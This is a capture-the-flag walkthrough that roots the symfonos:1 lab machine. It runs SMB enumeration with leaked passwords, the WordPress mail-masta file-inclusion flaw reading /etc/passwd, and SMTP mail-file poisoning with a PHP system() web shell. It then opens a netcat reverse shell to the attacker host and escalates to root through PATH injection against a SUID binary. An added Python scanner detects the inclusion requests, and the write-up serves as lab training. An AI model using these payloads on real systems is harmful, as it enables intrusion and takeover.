First, let's start off with an nmap scan of the remote host.
root@ubuntu:~# nmap -sV -sC -O -T5 192.168.56.102
Starting Nmap 7.60 ( https://nmap.org ) at 2019-10-25 14:41 MDT
Nmap scan report for 192.168.56.102
Host is up (0.00064s latency).
Not shown: 995 closed ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
|   2048 ab:5b:45:a7:05:47:a5:04:45:ca:6f:18:bd:18:03:c2 (RSA)
|   256 a0:5f:40:0a:0a:1f:68:35:3e:f4:54:07:61:9f:c6:4a (ECDSA)
|_  256 bc:31:f5:40:bc:08:58:4b:fb:66:17:ff:84:12:ac:1d (EdDSA)
25/tcp  open  smtp        Postfix smtpd
|_smtp-commands: symfonos.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=symfonos
| Subject Alternative Name: DNS:symfonos
| Not valid before: 2019-06-29T00:29:42
|_Not valid after:  2029-06-26T00:29:42
|_ssl-date: TLS randomness does not represent time
80/tcp  open  http        Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
MAC Address: 08:00:27:F0:3A:FA (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: Hosts:  symfonos.localdomain, SYMFONOS; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -6h00m02s, deviation: 0s, median: -6h00m02s
|_nbstat: NetBIOS name: SYMFONOS, NetBIOS user:, NetBIOS MAC: (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.5.16-Debian)
|   Computer name: symfonos
|   NetBIOS computer name: SYMFONOS\x00
|   Domain name: \x00
|   FQDN: symfonos
|_  System time: 2019-10-25T09:41:42-05:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-10-25 08:41:42
|_  start_date: 1600-12-31 17:00:04

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.96 seconds
root@ubuntu:~#
Nmap returns a lot of results; ports 22, 25, 80, 139 and 445 are open. Let's start by enumerating the SMTP server for potential users on the system using Metasploit.
msf5 auxiliary(scanner/smtp/smtp_enum) > run

[*] 192.168.56.102:25     - 192.168.56.102:25 Banner: 220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
[+] 192.168.56.102:25     - 192.168.56.102:25 Users found: , backup, bin, daemon, ftp, games, gnats, irc, list, lp, mail, man, messagebus, news, nobody, postmaster, proxy, sshd, sync, sys, uucp, webmaster, www, www-data
[*] 192.168.56.102:25     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smtp/smtp_enum) >
Metasploit didn't come back with anything interesting, so let's move on to ports 139 and 445. SMB sharing is active, so let's connect to the server and see if we can list its shares.
root@ubuntu:~# smbclient -L //192.168.56.102 -N
WARNING: The "syslog" option is deprecated

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        helios          Disk      Helios personal share
        anonymous       Disk
        IPC$            IPC       IPC Service (Samba 4.5.16-Debian)
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            SYMFONOS
root@ubuntu:~#
We found two shares, 'helios' and 'anonymous'. Let's connect to anonymous and see if there are any files in there.
root@ubuntu:~# smbclient //192.168.56.102/anonymous -N
WARNING: The "syslog" option is deprecated
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun 28 19:14:49 2019
  ..                                  D        0  Fri Jun 28 19:12:15 2019
  attention.txt                       N      154  Fri Jun 28 19:14:49 2019

                19994224 blocks of size 1024. 17304232 blocks available
smb: \> more attention.txt
getting file \attention.txt of size 154 as /tmp/smbmore.J6XJzb (5.2 KiloBytes/sec) (average 5.2 KiloBytes/sec)
smb: \> get attention.txt
getting file \attention.txt of size 154 as attention.txt (50.1 KiloBytes/sec) (average 9.4 KiloBytes/sec)
smb: \>
root@ubuntu:~# cat attention.txt

Can users please stop using passwords like 'epidioko', 'qwerty' and 'baseball'!

Next person I find using one of these passwords will be fired!

-Zeus
root@ubuntu:~#
We find a file listing some passwords that users have been told not to use. Let's go back to the console and try to log in to the helios share with one of those passwords.
root@ubuntu:~# smbclient //192.168.56.102/helios --user=helios
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\helios's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Fri Jun 28 18:32:05 2019
  ..                                  D        0  Fri Jun 28 18:37:04 2019
  research.txt                        A      432  Fri Jun 28 18:32:05 2019
  todo.txt                            A       52  Fri Jun 28 18:32:05 2019

                19994224 blocks of size 1024. 17278144 blocks available
smb: \>

Contents of todo.txt:

1. Binge watch Dexter
2. Dance
3. Work on /h3l105
The password for the user helios is 'qwerty', and we find two files in the share. research.txt didn't have much information, but todo.txt gives us a directory to work with: visiting /h3l105 we find a WordPress install. Now it's time to fire up wpscan and see what it can find.
[+] admin
 | Detected By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://symfonos.local/h3l105/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

Plugins

[+] mail-masta
 | Location: http://symfonos.local/h3l105/wp-content/plugins/mail-masta/
 | Latest Version: 1.0 (up to date)
 | Last Updated: 2014-09-19T07:52:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/mail-masta/readme.txt

[+] site-editor
 | Location: http://symfonos.local/h3l105/wp-content/plugins/site-editor/
 | Latest Version: 1.1.1 (up to date)
 | Last Updated: 2017-05-02T23:34:00.000Z
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.1.1 (80% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://symfonos.local/h3l105/wp-content/plugins/site-editor/readme.txt
wpscan came back with some good results: two plugins, mail-masta and site-editor, that we can search for vulnerabilities in. After doing some searching, I found a working exploit here: https://www.exploit-db.com/exploits/40290 . So now all there is to do is paste the URL in and include files from the remote system.
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
_apt:x:104:65534::/nonexistent:/bin/false
Debian-exim:x:105:109::/var/spool/exim4:/bin/false
messagebus:x:106:111::/var/run/dbus:/bin/false
sshd:x:107:65534::/run/sshd:/usr/sbin/nologin
helios:x:1000:1000:,,,:/home/helios:/bin/bash
mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false
postfix:x:109:115::/var/spool/postfix:/bin/false
We see the user 'helios' is on the system. Now we need to poison a file that we can include through the LFI, so that its contents are executed as PHP on the remote system. Remember that there is an SMTP server running on the remote host: we can poison the mail log (the user's mail file, /var/mail/helios) with a message, include it through the LFI on the WordPress site, and run commands if all goes well.
root@ubuntu:~/src/nikto/program# telnet 192.168.56.102 25
Trying 192.168.56.102...
Connected to 192.168.56.102.
Escape character is '^]'.
220 symfonos.localdomain ESMTP Postfix (Debian/GNU)
MAIL FROM:
250 2.1.0 Ok
RCPT TO helios
501 5.5.4 Syntax: RCPT TO:
RCPT TO: helios
250 2.1.5 Ok
data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET['c']); ?>
.
250 2.0.0 Ok: queued as 9FDE640698
quit
221 2.0.0 Bye
Connection closed by foreign host.
root@ubuntu:~/src/nikto/program#
We have successfully placed our PHP code in the mail file; when the LFI includes that file, the body of our message is interpreted as PHP code on the remote host. What we want is a reverse shell, so we try netcat and see if it works.
http://symfonos.local/h3l105/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=nc -e /bin/bash 192.168.56.101 4444

root@kali:~# nc -l -v -p 4444
listening on [any] 4444 ...
192.168.56.102: inverse host lookup failed: Unknown host
connect to [192.168.56.101] from (UNKNOWN) [192.168.56.102] 49342
python -c 'import pty; pty.spawn("/bin/bash")'

We get a connection back and drop into a system shell. Our next task is to search for SUID files on the remote host.
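On the defensive side, as an added example that is not part of the original writeup: a small Python scanner that flags Apache access-log requests to the mail-masta count_of_send.php endpoint whose pl parameter carries an absolute or traversal path, points into a mail spool or log directory, or arrives with extra query parameters (the c= used above). The log lines are constructed samples, not logs taken from the target.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache access-log lines mirroring the request pattern above (sample data only).
SAMPLE_LOG = [
    '192.168.56.101 - - [25/Oct/2019:14:50:01 -0600] "GET /h3l105/ HTTP/1.1" 200 5123',
    '192.168.56.101 - - [25/Oct/2019:14:51:12 -0600] "GET /h3l105/wp-content/plugins/'
    'mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1" 200 1743',
    '192.168.56.101 - - [25/Oct/2019:14:53:40 -0600] "GET /h3l105/wp-content/plugins/'
    'mail-masta/inc/campaign/count_of_send.php?pl=/var/mail/helios&c=id HTTP/1.1" 200 2210',
    '192.168.56.101 - - [25/Oct/2019:14:54:02 -0600] "GET /h3l105/wp-content/plugins/'
    'mail-masta/inc/campaign/count_of_send.php?pl=../../../../etc/passwd HTTP/1.1" 200 1743',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
INCLUDE_PARAM = "pl"  # the query parameter count_of_send.php hands to include()
LOG_SOURCES = ("/var/mail/", "/var/log/", "/proc/self/")  # files an outsider can write into indirectly

def inspect_request(target):
    """Return the reasons a request to the mail-masta include endpoint looks like LFI abuse."""
    parts = urlsplit(target)
    if not parts.path.endswith("/mail-masta/inc/campaign/count_of_send.php"):
        return []
    params = parse_qs(parts.query, keep_blank_values=True)
    reasons = []
    for value in params.get(INCLUDE_PARAM, []):
        if value.startswith("/") or "../" in value:
            reasons.append("absolute or traversal path in include parameter")
        if value.startswith(LOG_SOURCES):
            reasons.append("include of a mail/log file (log poisoning)")
    if reasons and set(params) - {INCLUDE_PARAM}:
        reasons.append("extra query parameters alongside the include (possible command argument)")
    return reasons

def scan_access_log(lines):
    """Return (line_number, reasons) for every log line that trips a rule."""
    findings = []
    for number, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if match is None:
            continue
        reasons = inspect_request(match.group("target"))
        if reasons:
            findings.append((number, reasons))
    return findings

if __name__ == "__main__":
    for number, reasons in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: " + "; ".join(reasons))
```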
helios@symfonos:/var/www/html/h3l105$ find / -xdev -perm -4000 -type f 2>/dev/null
<3l105$ find / -xdev -perm -4000 -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/chfn
/opt/statuscheck
/bin/mount
/bin/umount
/bin/su
/bin/ping
helios@symfonos:/var/www/html/h3l105$

We find one that sticks out: '/opt/statuscheck'. If we run strings on the binary we get back some interesting results.
helios@symfonos:/var/www/html/h3l105$ strings /opt/statuscheck
strings /opt/statuscheck
/lib64/ld-linux-x86-64.so.2
libc.so.6
system
__cxa_finalize
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
curl -I H
http://lH
ocalhostH
AWAVA
AUATL
[]A\A]A^A_
;*3$"
GCC: (Debian 6.3.0-18+deb9u1) 6.3.0 20170516
helios@symfonos:/var/www/html/h3l105$

From the imported system symbol and the fragments 'curl -I', 'http://l' and 'ocalhost' we can see that it executes the command 'curl -I http://localhost'. What we want to do is elevate our privileges using the statuscheck program and PATH injection. First we change directory to /tmp so we can set up our bogus curl binary.
helios@symfonos:/var/www/html/h3l105$ cd /tmp
cd /tmp
helios@symfonos:/tmp$ echo "/bin/sh" > curl
echo "/bin/sh" > curl
helios@symfonos:/tmp$ chmod 777 curl

Next we prepend /tmp to our PATH so that the shell searches that directory first for any binary to run; statuscheck will then execute our curl with root privileges and give us a shell.
helios@symfonos:/tmp$ export PATH=/tmp:$PATH
export PATH=/tmp:$PATH
helios@symfonos:/tmp$ echo $PATH
echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
helios@symfonos:/tmp$

After that, all there is to do is run /opt/statuscheck and see if we get a root shell.
helios@symfonos:/tmp$ /opt/statuscheck
/opt/statuscheck
# id
id
uid=1000(helios) gid=1000(helios) euid=0(root) groups=1000(helios),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev)
# whoami
whoami
root
# cd /root
cd /root
# ls -la
ls -la
total 24
drwx------  2 root root 4096 Jun 28 21:09 .
drwxr-xr-x 22 root root 4096 Jun 28 19:27 ..
lrwxrwxrwx  1 root root    9 Jun 28 19:48 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Jun 28 21:03 .selected_editor
-rw-r--r--  1 root root 1735 Jun 28 19:38 proof.txt
# cat proof.txt
cat proof.txt
Congrats on rooting symfonos:1!
[ASCII art banner]
Contact me via Twitter @zayotic to give feedback!
#

As you can see, our binary executed just as we planned and gave us a root shell.